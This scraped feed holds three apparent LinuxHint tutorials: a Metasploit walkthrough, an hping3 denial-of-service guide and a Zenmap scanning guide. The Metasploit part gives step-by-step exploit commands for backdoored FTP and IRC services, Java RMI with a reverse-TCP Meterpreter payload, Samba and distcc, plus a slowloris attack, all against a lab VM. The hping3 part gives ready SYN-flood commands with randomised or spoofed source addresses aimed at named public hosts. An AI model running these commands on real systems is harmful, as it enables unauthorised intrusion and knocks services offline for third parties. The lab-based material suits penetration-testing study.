[*] Nmap: |       https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/
unix/ftp/vsftpd_234_backdoor.rb
[*] Nmap: |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2523

Below you can see, additionally to FTP security holes, Nmap detected SSL vulnerabilities:

[*] Nmap: |_sslv2-drown:
[*] Nmap: 22/tcp   open  ssh
[*] Nmap: 23/tcp   open  telnet
[*] Nmap: 25/tcp   open  smtp
[*] Nmap: | smtp-vuln-cve2010-4344:
[*] Nmap: |_  The SMTP server is not Exim: NOT VULNERABLE
[*] Nmap: | ssl-dh-params:
[*] Nmap: |   VULNERABLE:
[*] Nmap: |   Anonymous Diffie-Hellman Key Exchange MitM Vulnerability
[*] Nmap: |     State: VULNERABLE
[*] Nmap: |       Transport Layer Security (TLS) services that use anonymous
[*] Nmap: |       Diffie-Hellman key exchange only provide protection against passive
[*] Nmap: |       eavesdropping, and are vulnerable to active man-in-the-middle attacks
[*] Nmap: |       which could completely compromise the confidentiality and integrity
[*] Nmap: |       of any data exchanged over the resulting session.
[*] Nmap: |     Check results:
[*] Nmap: |       ANONYMOUS DH GROUP 1
[*] Nmap: |             Cipher Suite: TLS_DH_anon_WITH_AES_256_CBC_SHA
[*] Nmap: |             Modulus Type: Safe prime
[*] Nmap: |             Modulus Source: postfix builtin
[*] Nmap: |             Modulus Length: 1024
[*] Nmap: |             Generator Length: 8
[*] Nmap: |             Public Key Length: 1024
[*] Nmap: |     References:
[*] Nmap: |       https://www.ietf.org/rfc/rfc2246.txt
[*] Nmap: |
[*] Nmap: |   Transport Layer Security (TLS) Protocol DHE_EXPORT Ciphers Downgrade MitM (Logjam)
[*] Nmap: |     State: VULNERABLE
[*] Nmap: |     IDs:  OSVDB:122331  CVE:CVE-2015-4000
[*] Nmap: |       The Transport Layer Security (TLS) protocol contains a flaw that is
[*] Nmap: |       triggered when handling Diffie-Hellman key exchanges defined with
[*] Nmap: |       the DHE_EXPORT cipher. This may allow a man-in-the-middle attacker
[*] Nmap: |       to downgrade the security of a TLS session to 512-bit export-grade
[*] Nmap: |       cryptography, which is significantly weaker, allowing the attacker
[*] Nmap: |       to more easily break the encryption and monitor or tamper with
[*] Nmap: |       the encrypted stream.
[*] Nmap: |     Disclosure date: 2015-5-19
[*] Nmap: |     Check results:
[*] Nmap: |       EXPORT-GRADE DH GROUP 1
[*] Nmap: |             Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
[*] Nmap: |             Modulus Type: Safe prime
[*] Nmap: |             Modulus Source: Unknown/Custom-generated
[*] Nmap: |             Modulus Length: 512
[*] Nmap: |             Generator Length: 8
[*] Nmap: |             Public Key Length: 512
[*] Nmap: |     References:
[*] Nmap: |       https://weakdh.org
[*] Nmap: |       http://osvdb.org/122331
[*] Nmap: |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000
[*] Nmap: |
[*] Nmap: |   Diffie-Hellman Key Exchange Insufficient Group Strength
[*] Nmap: |     State: VULNERABLE
[*] Nmap: |       Transport Layer Security (TLS) services that use Diffie-Hellman groups
[*] Nmap: |       of insufficient strength, especially those using one of a few commonly
[*] Nmap: |       shared groups, may be susceptible to passive eavesdropping attacks.
[*] Nmap: |     Check results:
[*] Nmap: |       WEAK DH GROUP 1
[*] Nmap: |             Cipher Suite: TLS_DHE_RSA_WITH_DES_CBC_SHA
[*] Nmap: |             Modulus Type: Safe prime
[*] Nmap: |             Modulus Source: postfix builtin
[*] Nmap: |             Modulus Length: 1024
[*] Nmap: |             Generator Length: 8
[*] Nmap: |             Public Key Length: 1024
[*] Nmap: |     References:
[*] Nmap: |_      https://weakdh.org
[*] Nmap: | ssl-poodle:
[*] Nmap: |   VULNERABLE:
[*] Nmap: |   SSL POODLE information leak
[*] Nmap: |     State: VULNERABLE
[*] Nmap: |     IDs:  OSVDB:113251  CVE:CVE-2014-3566
[*] Nmap: |           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other
[*] Nmap: |           products, uses nondeterministic CBC padding, which makes it easier
[*] Nmap: |           for man-in-the-middle attackers to obtain cleartext data via a
[*] Nmap: |           padding-oracle attack, aka the "POODLE" issue.
[*] Nmap: |     Disclosure date: 2014-10-14
[*] Nmap: |     Check results:
[*] Nmap: |       TLS_RSA_WITH_AES_128_CBC_SHA
[*] Nmap: |     References:
[*] Nmap: |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566
[*] Nmap: |       https://www.openssl.org/~bodo/ssl-poodle.pdf
[*] Nmap: |       https://www.imperialviolet.org/2014/10/14/poodle.html
[*] Nmap: |_      http://osvdb.org/113251
[*] Nmap: | sslv2-drown:
[*] Nmap: |   ciphers:
[*] Nmap: |     SSL2_RC4_128_EXPORT40_WITH_MD5
[*] Nmap: |     SSL2_DES_192_EDE3_CBC_WITH_MD5
[*] Nmap: |     SSL2_RC2_128_CBC_WITH_MD5
[*] Nmap: |     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
[*] Nmap: |     SSL2_RC4_128_WITH_MD5
[*] Nmap: |     SSL2_DES_64_CBC_WITH_MD5
[*] Nmap: |   vulns:
[*] Nmap: |     CVE-2016-0703:
[*] Nmap: |       title: OpenSSL: Divide-and-conquer session key recovery in SSLv2
[*] Nmap: |       state: VULNERABLE
[*] Nmap: |       ids:
[*] Nmap: |         CVE:CVE-2016-0703
[*] Nmap: |       description:
[*] Nmap: |               The get_client_master_key function in s2_srvr.c in the SSLv2 implementation in
[*] Nmap: |       OpenSSL before 0.9.8zf, 1.0.0 before 1.0.0r, 1.0.1 before 1.0.1m, and 1.0.2 before
[*] Nmap: |       1.0.2a accepts a nonzero CLIENT-MASTER-KEY CLEAR-KEY-LENGTH value for an arbitrary
[*] Nmap: |       cipher, which allows man-in-the-middle attackers to determine the MASTER-KEY value
[*] Nmap: |       and decrypt TLS ciphertext data by leveraging a Bleichenbacher RSA padding oracle, a
[*] Nmap: |       related issue to CVE-2016-0800.
[*] Nmap: |
[*] Nmap: |       refs:
[*] Nmap: |         https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0703
[*] Nmap: |         https://www.openssl.org/news/secadv/20160301.txt

The following extract shows a lot of vulnerabilities were found at the webserver including access to sensible login pages and Denial of Service vulnerabilities.


[*] Nmap: 53/tcp   open  domain
[*] Nmap: 80/tcp   open  http
[*] Nmap: | http-csrf:
[*] Nmap: | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.0.184
[*] Nmap: |   Found the following possible CSRF vulnerabilities:
[*] Nmap: |
[*] Nmap: |     Path: http://192.168.0.184:80/dvwa/
[*] Nmap: |     Form id:
[*] Nmap: |     Form action: login.php
[*] Nmap: |
[*] Nmap: |     Path: http://192.168.0.184:80/dvwa/login.php
[*] Nmap: |     Form id:
[*] Nmap: |_    Form action: login.php
[*] Nmap: |_http-dombased-xss: Couldn't find any DOM based XSS.
[*] Nmap: | http-enum:
[*] Nmap: |   /tikiwiki/: Tikiwiki
[*] Nmap: |   /test/: Test page
[*] Nmap: |   /phpinfo.php: Possible information file
[*] Nmap: |   /phpMyAdmin/: phpMyAdmin
[*] Nmap: |   /doc/: Potentially interesting directory w/ listing on 'apache/2.2.8 (ubuntu) dav/2'
[*] Nmap: |   /icons/: Potentially interesting folder w/ directory listing
[*] Nmap: |_  /index/: Potentially interesting folder
[*] Nmap: | http-slowloris-check:
[*] Nmap: |   VULNERABLE:
[*] Nmap: |   Slowloris DOS attack
[*] Nmap: |     State: LIKELY VULNERABLE
[*] Nmap: |     IDs:  CVE:CVE-2007-6750
[*] Nmap: |       Slowloris tries to keep many connections to the target web server open and hold
[*] Nmap: |       them open as long as possible.  It accomplishes this by opening connections to
[*] Nmap: |       the target web server and sending a partial request. By doing so, it starves
[*] Nmap: |       the http server's resources causing Denial Of Service.
[*] Nmap: |
[*] Nmap: |    Disclosure date: 2009-09-17
[*] Nmap: |    References:
[*] Nmap: |    http://ha.ckers.org/slowloris/
[*] Nmap: |_   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750

At this stage Nmap found a lot of SQL injection vulnerabilities, the quantity of vulnerabilities was so big for this tutorial I removed many of them and left some:



[*] Nmap: | http-sql-injection:
[*] Nmap: |   Possible sqli for queries:
[*] Nmap: |     http://192.168.0.184:80/dav/?C=N%3bO%3dD%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/dav/?C=S%3bO%3dA%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/dav/?C=M%3bO%3dA%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/dav/?C=D%3bO%3dA%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/mutillidae/index.php?page=pen-test-tool-lookup.php%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/mutillidae/index.php?page=documentation%2fvulnerabilities.php%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/mutillidae/index.php?page=capture-data.php%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/mutillidae/index.php?page=text-file-viewer.php%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/mutillidae/?page=add-to-your-blog.php%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/mutillidae/?page=show-log.php%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/mutillidae/index.php?page=register.php%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/mutillidae/index.php?page=html5-storage.php%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/mutillidae/index.php?page=user-info.php%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/mutillidae/index.php?page=home.php&do=toggle-hints%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/mutillidae/index.php?page=show-log.php%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/mutillidae/index.php?page=notes.php%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/mutillidae/index.php?page=framing.php%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/mutillidae/index.php?page=php-errors.php%27%20OR%20sqlspider
[*] Nmap: |     http://192.168.0.184:80/mutillidae/index.php?page=home.php&
do=toggle-security%27%20OR%20sqlspider

Below Nmap discards XSS vulnerabilities again (like in the first extract), and reports

Remote Method Invocation (RMI) security holes due wrong configuration allowing an attacker to allowing malicious Java code execution:



[*] Nmap: |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
[*] Nmap: |_http-trace: TRACE is enabled
[*] Nmap: |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
[*] Nmap: 111/tcp  open  rpcbind
[*] Nmap: 139/tcp  open  netbios-ssn
[*] Nmap: 445/tcp  open  microsoft-ds
[*] Nmap: 512/tcp  open  exec
[*] Nmap: 513/tcp  open  login
[*] Nmap: 514/tcp  open  shell
[*] Nmap: 1099/tcp open  rmiregistry
[*] Nmap: | rmi-vuln-classloader:
[*] Nmap: |   VULNERABLE:
[*] Nmap: |   RMI registry default configuration remote code execution vulnerability
[*] Nmap: |     State: VULNERABLE
[*] Nmap: |       Default configuration of RMI registry allows loading classes from remote URLs which
 can lead to remote code execution.
[*] Nmap: |
[*] Nmap: |     References:
[*] Nmap: |_      https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/
misc/java_rmi_server.rb

Below you can see additional SSL vulnerabilities were found:


[*] Nmap: | ssl-ccs-injection:
[*] Nmap: |   VULNERABLE:
[*] Nmap: |   SSL/TLS MITM vulnerability (CCS Injection)
[*] Nmap: |     State: VULNERABLE
[*] Nmap: |     Risk factor: High
[*] Nmap: |       OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h
[*] Nmap: |       does not properly restrict processing of ChangeCipherSpec messages,
[*] Nmap: |       which allows man-in-the-middle attackers to trigger use of a zero
[*] Nmap: |       length master key in certain OpenSSL-to-OpenSSL communications, and
[*] Nmap: |       consequently hijack sessions or obtain sensitive information, via
[*] Nmap: |       a crafted TLS handshake, aka the "CCS Injection" vulnerability.
[*] Nmap: |
[*] Nmap: |     References:
[*] Nmap: |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224
[*] Nmap: |       http://www.cvedetails.com/cve/2014-0224
[*] Nmap: |_      http://www.openssl.org/news/secadv_20140605.txt
[*] Nmap: | ssl-dh-params:
[*] Nmap: |   VULNERABLE:
[*] Nmap: |   Diffie-Hellman Key Exchange Insufficient Group Strength
[*] Nmap: |     State: VULNERABLE
[*] Nmap: |       Transport Layer Security (TLS) services that use Diffie-Hellman groups
[*] Nmap: |       of insufficient strength, especially those using one of a few commonly
[*] Nmap: |       shared groups, may be susceptible to passive eavesdropping attacks.
[*] Nmap: |     Check results:
[*] Nmap: |       WEAK DH GROUP 1
[*] Nmap: |             Cipher Suite: TLS_DHE_RSA_WITH_AES_128_CBC_SHA
[*] Nmap: |             Modulus Type: Safe prime
[*] Nmap: |             Modulus Source: Unknown/Custom-generated
[*] Nmap: |             Modulus Length: 1024
[*] Nmap: |             Generator Length: 8
[*] Nmap: |             Public Key Length: 1024
[*] Nmap: |     References:
[*] Nmap: |_      https://weakdh.org
[*] Nmap: | ssl-poodle:
[*] Nmap: |   VULNERABLE:
[*] Nmap: |   SSL POODLE information leak
[*] Nmap: |     State: VULNERABLE
[*] Nmap: |     IDs:  OSVDB:113251  CVE:CVE-2014-3566
[*] Nmap: |           The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other

The next extract shows our target is possibly infected with a trojan against an IRC service:


[*] Nmap: |_irc-unrealircd-backdoor: Looks like trojaned version of unrealircd. 
See http://seclists.org/fulldisclosure/2010/Jun/277
[*] Nmap: 8009/tcp open  ajp13

The following extract shows the httponly flag isn’t properly configured, therefore the target is vulnerable to cross-site scripting attacks:


[*] Nmap: 8180/tcp open  unknown
[*] Nmap: | http-cookie-flags:
[*] Nmap: |   /admin/:
[*] Nmap: |     JSESSIONID:
[*] Nmap: |       httponly flag not set
[*] Nmap: |   /admin/index.html:
[*] Nmap: |     JSESSIONID:
[*] Nmap: |       httponly flag not set
[*] Nmap: |   /admin/login.html:
[*] Nmap: |     JSESSIONID:
[*] Nmap: |       httponly flag not set
[*] Nmap: |   /admin/admin.html:
[*] Nmap: |     JSESSIONID:
[*] Nmap: |       httponly flag not set
[*] Nmap: |   /admin/account.html:
[*] Nmap: |     JSESSIONID:
[*] Nmap: |       httponly flag not set
[*] Nmap: |   /admin/admin_login.html:
[*] Nmap: |     JSESSIONID:
[*] Nmap: |       httponly flag not set
[*] Nmap: |   /admin/home.html:

The following extract enumerates or lists interesting found accessible directories on our target:


[*] Nmap: | http-enum:
[*] Nmap: |   /admin/: Possible admin folder
[*] Nmap: |   /admin/index.html: Possible admin folder
[*] Nmap: |   /admin/login.html: Possible admin folder
[*] Nmap: |   /admin/admin.html: Possible admin folder
[*] Nmap: |   /admin/account.html: Possible admin folder
[*] Nmap: |   /admin/admin_login.html: Possible admin folder
[*] Nmap: |   /admin/home.html: Possible admin folder
[*] Nmap: |   /admin/admin-login.html: Possible admin folder
[*] Nmap: |   /admin/adminLogin.html: Possible admin folder
[*] Nmap: |   /admin/controlpanel.html: Possible admin folder
[*] Nmap: |   /admin/cp.html: Possible admin folder
[*] Nmap: |   /admin/index.jsp: Possible admin folder

Finally, the scan ends and the post-scanning NSE is executed:


[*] Nmap: |
[*] Nmap: |     Disclosure date: 2009-09-17
[*] Nmap: |     References:
[*] Nmap: |       http://ha.ckers.org/slowloris/
[*] Nmap: |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
[*] Nmap: MAC Address: 08:00:27:DD:87:8C (Oracle VirtualBox virtual NIC)
[*] Nmap: Host script results:
[*] Nmap: |_smb-vuln-ms10-054: false
[*] Nmap: |_smb-vuln-ms10-061: false
[*] Nmap: NSE: Script Post-scanning.
[*] Nmap: Initiating NSE at 17:02
[*] Nmap: Completed NSE at 17:02, 0.00s elapsed
[*] Nmap: Initiating NSE at 17:02
[*] Nmap: Completed NSE at 17:02, 0.00s elapsed
[*] Nmap: Read data files from: /opt/metasploit/common/share/nmap/
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 333.96 seconds
[*] Nmap: Raw packets sent: 1001 (44.028KB) | Rcvd: 1001 (40.120KB)
msf5 >

Now we have identified some security holes to attack our target.

Using Metasploit to hack an FTP server:

Once you identified security holes on your target use Metasploit commands to find proper exploits against them. As you saw previously one of the first vulnerabilities found was on the vsFTPD server, to find proper exploits, within Metasploit run:

# search vsftpd

As you see Metasploit contains a backdoor which possibly may help us to hack our target FTP.  To use this exploit, within Metasploit run:

# use exploit/unix/ftp/vsftpd_234_backdoor

To learn how to use any specific exploit run:

# show options

As you see above this exploit contains 2 options, RHOSTS (remote host) and RPORT. We need to specify the RHOST, the port is already specified (21).
To set the Remote Host (RHOST) defining the target IP run:

# set RHOST 192.168.0.184

Once defined the target run the following command to exploit the security hole:

# exploit

As you could see I got a shell into the target, when running “ls” I can see the target files, the attack succeeded. To leave the target just run:

#exit

Using Metasploit for DOS attack:

As you saw during the scan process, a DOS slowloris vulnerability was found, in order to find how to exploit it follow the previous steps to search for a proper tool, in this case an auxiliary module instead of an exploit:

# search slowloris

Once we found a tool to attack, run:

# use auxiliary/dos/http/slowloris

# set RHOST 192.168.0.184

Then just type:

# run

You’ll notice while the attack runs, the target http service won’t be available, it keeps loading:

 

Once we stop the attack by pressing CTRL+C the server will be available again:

Using Metasploit to hack an IRC server:

Internet Relay Chat is widely used worldwide, as you could notice during the first stages of the scan Metasploit possibly found an IRC (Unreal IRCD)  service infected with a trojan.

Let’s repeat the steps to find a tool to hack it:

# search unreal ircd

# use exploit/unix/irc/unreal_ircd_3281_backdoor
# show options
# set RHOST 192.168.0.184

Then run:

# exploit

And as you can see again, we have a shell session within the target.

Using Metasploit to execute Java malicious code:

# use exploit/multi/misc/java_rmi_server
# show options

# set RHOST 192.168.0.184
# show payloads
# set payload java/meterpreter/reverse_tcp

# set LHOST 192.168.0.50

# exploit

Using Metasploit to hack through Samba Usermap Script vulnerability:

Some steps like exploits search will be omitted to avoid a huge tutorial. To exploit this vulnerability run:

# use exploit/multi/samba/usermap_script
# show options

Set the target IP and exploit it by running:

# set RHOST 192.168.0.184
# exploit

As you can see, we gained a shell into our target.

Using Metasploit to exploit DistCC Daemon Command Execution:

This vulnerability is explained here.

To begin run:

# use exploit/Unix/misc/distcc_exec

Then run:

# set RHOST 192.168.0.184
# exploit

As you can see, we gained access to the target again.

Using Metasploit for port scan (additional way without Nmap):

Carrying out a TCP scan with Metasploit:

To run a different scan without using Nmap Metasploit offers alterntives you can find by running:

# search portscan

To do a tcp scan run:

# use scanner/portscan/tcp
# set RHOST 192.168.0.184

To see additional options:

# show options

Choose the port range you want to scan by running:

# set PORTS 21-35

Then run the scan by executing:

# run

As you can see ports 22,25,23 and 21 were found open.

Carrying out a SYN scan with Metasploit:

For a SYN scan run:

# use auxiliary/scanner/portscan/syn
# set RHOST 192.168.0.184
# set PORTS 80
# run

As you can see port 80 was found open.

CONCLUSION

Metasploit is like a swiss army knife it has so many functions. I hope you found this tutorial no Metasploit useful. Keep following LinuxHint for more tips and updates on Linux and networking.

]]>
hping3 flood ddos https://linuxhint.com/hping3/ Fri, 07 Feb 2020 20:15:37 +0000 https://linuxhint.com/?p=54857 This tutorial focuses on DDOS (Distributed Denial of Service) attacks using the hping3 tool. If you are already familiarized with DOS (Denial of Service) and DDOS attacks you can continue reading from the hping3 practical instructions, otherwise it is recommended to learn about how these attacks work.

DOS Attacks


A denial of Service (DOS) attack is a very simple technique to deny accessibility to services (that’s why it is called “denial of service” attack). This attack consists of overloading the target with oversized packets, or a big quantity of them.

While this attack is very easy to execute, it does not compromise the information or privacy of the target, it is not a penetrative attack and only aims to prevent access to the target.
By sending a quantity of packets the target can’t handle attackers prevent the server from serving legitimate users.

DOS attacks are carried out from a single device, therefore it is easy to stop them by blocking the attacker IP, yet the attacker can change and even spoof (clone) the target IP address but it is not hard for firewalls to deal with such attacks, contrary to what happens with DDOS attacks.

DDOS Attacks

A Distributed Denial of Service attack (DDOS) is similar to a DOS attack but carried out from different nodes (or different attackers) simultaneously. Commonly DDOS attacks are carried out by botnets. Botnets are automated scripts or programs which infect computers to carry out an automated task (in this case a DDOS attack). A hacker can create a botnet and infect many  computers from which  botnets will launch DOS attacks, the fact many botnets are shooting simultaneously turn the DOS attack into a DDOS attack (that’s why it is called “distributed”).

Of course, there are exceptions in which DDOS attacks were carried out by real human attackers, for example the hackers group Anonymous integrated by thousands of people worldwide used this technique very frequently due its easy implementation (it only required volunteers who shared their cause), that’s for example how Anonymous left Gaddafi’s Libyan government completely disconnected during the invasion, the Libyan state was left defenseless before thousands of attackers from worldwide.

This type of attacks, when carried out from many different nodes is extremely difficult to prevent and stop and normally require special hardware to deal with, this is because firewalls and defensive applications aren’t prepared to deal with thousands of attackers simultaneously. This is not the case of hping3, most of attacks carried out through this tool will be blocked by defensive devices or software, yet it is useful in local networks or against poorly protected targets.

About hping3

The tool hping3 allows you to send manipulated packets. This tool allows you to control the size, quantity and fragmentation of packets in order to overload the target and bypass or attack firewalls. Hping3 can be useful for security or capability testing purposes, using it you can test firewalls effectivity and if a server can handle a big amount of packets. Below you will find instructions on how to use hping3 for security testing purposes.

Getting started with DDOS attacks using hping3:

On Debian and based Linux distributions you can install hping3 by running:

# apt install hping3 -y

A simple DOS (not DDOS) attack would be:

# sudo hping3 -S --flood -V -p 80 170.155.9.185

Where:
sudo: gives needed privileges to run hping3.
hping3:
calls hping3 program.
-S: specifies SYN packets.
–flood: shoot at discretion, replies will be ignored (that’s why replies wont be shown) and packets will be sent fast as possible.
-V: Verbosity.
-p 80: port 80, you can replace this number for the service you want to attack.
170.155.9.185: target IP.

Flood using SYN packets against port 80:

The following example portrays a SYN attack against lacampora.org:

# sudo hping3 lacampora.org -q -n -d 120 -S -p 80 --flood --rand-source

Where:
Lacampora.org: is the target
-q: brief output
-n: show target IP instead of host.
-d 120: set packet size
–rand-source: hide IP address.

The following example shows another flood possible example:

SYN flood against port 80:

# sudo hping3 --rand-source ivan.com -S -q -p 80 --flood

With hping3 you can also attack your targets with a fake IP, in order to bypass a firewall you can even clone your target IP itself, or any allowed address you may know (you can achieve it for example with Nmap or a sniffer to listen established connections).

The syntax would be:

# sudo hping3 -a <FAKE IP> <target> -S -q -p 80 --faster -c2

In this practical example the attack would seem:

# sudo hping3 -a 190.0.175.100 190.0.175.100 -S -q -p 80 --faster -c2

I hope you found this tutorial on hping3 useful. Keep following LinuxHint for more tips and updates on Linux and networking.

]]>
How to use Zenmap to Scan a network https://linuxhint.com/zenmap_scan_network/ Fri, 07 Feb 2020 04:57:43 +0000 https://linuxhint.com/?p=54822 Zenmap is a GUI (Graphical User Interface) the most popular network scanner called Nmap (Network Mapper). This article shows how to carry out different scan types focusing on the flags executed behind the intuitive and user-friendly interface. While Zenmap usage is the same for all Linux systems the installation procedure is based on Debian and based Linux distributions.To being install Zenmap through the following command execution:

# apt install zenmap -y

Once installed you’ll find Zenmap on the apps menu, depending on the scan type you want to carry out it is recommended to run Zenmap as root, for example, Nmap SYN or raw scans requires special privileges to be executed.

Alternatively, you can run Zenmap from the console, but since a graphical interface is mandatory to get it installed this tutorial focused on graphical management.

Once executed you’ll see Zenmap main window including a drop down menu to select the profile. For the first example select the Regular Scan.

On the “Target” box, fill the field with the IP address, domain name, IP range or subnet to scan. Once selected, press on the “Scan” button, next to the drop down menu to select the desired Profile.

Below you will see the following tabs: Nmap Output, Ports / Hosts, Topology, Host Details and Scans.
Where:

Nmap Output: this output shows the regular Nmap output, this is the default screen when running scans.

Ports / Hosts: this tab prints services or ports with additional information sorted by hosts, if a single host is selected then it will list the status of scanned ports.

Topology: this tab shows the path packets go through until reaching the target, in other words it shows the hops between us and the target similarly to a traceroute (see https://linuxhint.com/traceroute_nmap/) displaying the network structure based on the path.

Host Details: this tab prints the information on the scanned host as a tree. The information printed in this tab includes the host name and its OS, if its online or down, the status of the scanned ports, the uptime and more. It also display vulnerability estimation based on available services on the target.

Scans: this tab shows an history of all executed scans, including running scans, you can also add scans by importing a file.

The following screenshot shows the Ports / Hosts tab:

As you can see the screenshot above lists all ports, their protocol, their state and service, when available if instructed by the type of scan it will also print the software version running behind each port.

The next tab shows the Topology or traceroute:

You can check this tab displays the traceroute by running a traceroute against linuxhint.com, of course, despite this is not the case take in consideration traceroute results may variate depending on hops availability.

You can check this tab displays the traceroute by running a traceroute against linuxhint.com, of course, despite this is not the case take in consideration traceroute results may variate depending on hops availability.

The following screenshots displays the Host Details tab, there you can see the OS identified with an icon, the state (up), number of open, filtered, closed and scanned ports, the uptime isn’t available, IP address and hostname.

To continue with the tutorial, lets check the Quick Scan mode by selecting it in the Profile drop down menu:

Once selected press on “Scan”. As you’ll see in the Command field you’ll see the flags -T4 and -F.

The -T4 refers to the timing template. Timing templates are:

Paranoid: -T0, extremely slow, useful to bypass IDS (Intrusion Detection Systems)
Sneaky: -T1, very slow, also useful to bypass IDS (Intrusion Detection Systems)
Polite: -T2, neutral.
Normal: -T3, this is the default mode.
Aggressive: -T4, fast scan.
Insane: -T5, faster than Aggressive  scan technique.

(Source: https://linuxhint.com/nmap_xmas_scan/)

The -F flag instructs Zenmap (and Nmap) to carry out a fast scan.

As you can see above, the result is shorter than the Regular scan, fewer ports were scanned and the result was ready after 2.75 seconds.

For the following example, on the Profile field select the intense scan, this time we will focus on the output.

When selecting this type of scan you’ll notice, additionally to the -T4 flag the -A flag.
The -A flag enables OS and version detection, script scanning and traceroute.
The -v flag increases the verbosity of the output.

Understanding the output:

The first lines show the characteristics of the scan process, the first line shows the Nmap version followed by information on the pre scan scripts to be executed, in this case 150 scripts from the Nmap Scripting Engine (NSE) were loaded:


Starting Nmap 7.70 ( https://nmap.org ) at 2020-01-29 20:08 -03
NSE: Loaded 150 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:08
Completed NSE at 20:08, 0.00s elapsed
Initiating NSE at 20:08
Completed NSE at 20:08, 0.00s elapsed

Following the prescan scripts, which are executed before carrying out the scan the Output will display information on the ping scan, the second step previous to the DNS resolution to gather the IP address (or the hostname if you provided an IP as target). The aim of the ping scan step is to discover the availability of the host.

Once the DNS resolution ends, a SYN scan is executed in order to run  a Stealth scan (see https://linuxhint.com/nmap_stealth_scan/).


Initiating Ping Scan at 20:08
Scanning linuxhint.com (64.91.238.144) [4 ports]
Completed Ping Scan at 20:08, 0.43s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:08
Completed Parallel DNS resolution of 1 host. at 20:08, 0.00s elapsed
Initiating SYN Stealth Scan at 20:08
Scanning linuxhint.com (64.91.238.144) [1000 ports]
Discovered open port 80/tcp on 64.91.238.144
Discovered open port 25/tcp on 64.91.238.144
Discovered open port 443/tcp on 64.91.238.144
Discovered open port 22/tcp on 64.91.238.144
Increasing send delay for 64.91.238.144 from 0 to 5 due to 158 out of 394 dropped probes since last increase.
Increasing send delay for 64.91.238.144 from 5 to 10 due to 162 out of 404 dropped probes since last increase.
Warning: 64.91.238.144 giving up on port because retransmission cap hit (6).
Completed SYN Stealth Scan at 20:08, 53.62s elapsed (1000 total ports)

Following the port scan, the intense scan will proceed with services and OS discovery:


Initiating Service scan at 20:08
Scanning 4 services on linuxhint.com (64.91.238.144)
Completed Service scan at 20:09, 13.25s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against linuxhint.com (64.91.238.144)
adjust_timeouts2: packet supposedly had rtt of -88215 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -88215 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -82678 microseconds.  Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -82678 microseconds.  Ignoring time.
Retrying OS detection (try #2) against linuxhint.com (64.91.238.144)

A traceroute is then executed to print us the network topology, or the hops between us and our target, it reported 11 hosts as you can see below, more information will be available at the Topology tab.


Initiating Traceroute at 20:09
Completed Traceroute at 20:09, 3.02s elapsed
Initiating Parallel DNS resolution of 11 hosts. at 20:09
Completed Parallel DNS resolution of 11 hosts. at 20:09, 0.53s elapsed

Once the scan process ends, post scan scripts will be executed:


NSE: Script scanning 64.91.238.144.
Initiating NSE at 20:09
Completed NSE at 20:09, 11.02s elapsed
Initiating NSE at 20:09
Completed NSE at 20:09, 5.22s elapsed

And finally you will have the report output for each step.
The first part of the report focuses on ports and services, showing the host is up, the number of closed ports which aren’t shown and detailed information on open or fileted ports:


Nmap scan report for linuxhint.com (64.91.238.144)
Host is up (0.21s latency).
Not shown: 978 closed ports
PORT           STATE         SERVICE      VERSION
22/tcp   open  ssh  OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 05:44:ab:4e:4e:9a:65:e5:f2:f4:e3:ff:f0:7c:37:fe (DSA)
|   2048 10:2f:75:a8:49:58:3e:44:21:fc:46:32:07:1d:3d:78 (RSA)
|   256 a3:d5:b9:2e:e4:49:06:84:b4:bb:e6:32:54:73:72:49 (ECDSA)
|_  256 21:ab:6c:2c:76:b7:5c:f4:0f:59:5c:a7:ab:ed:d5:5c (ED25519)
25/tcp   open          smtp            Postfix smtpd

|_smtp-commands: zk153f8d-liquidwebsites.com, PIPELINING, SIZE 10240000, ETRN, STARTTLS,
 ENHANCEDSTATUSCODES, 8BITMIME, DSN,
|_smtp-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: TLS randomness does not represent time
80/tcp   open          http              nginx
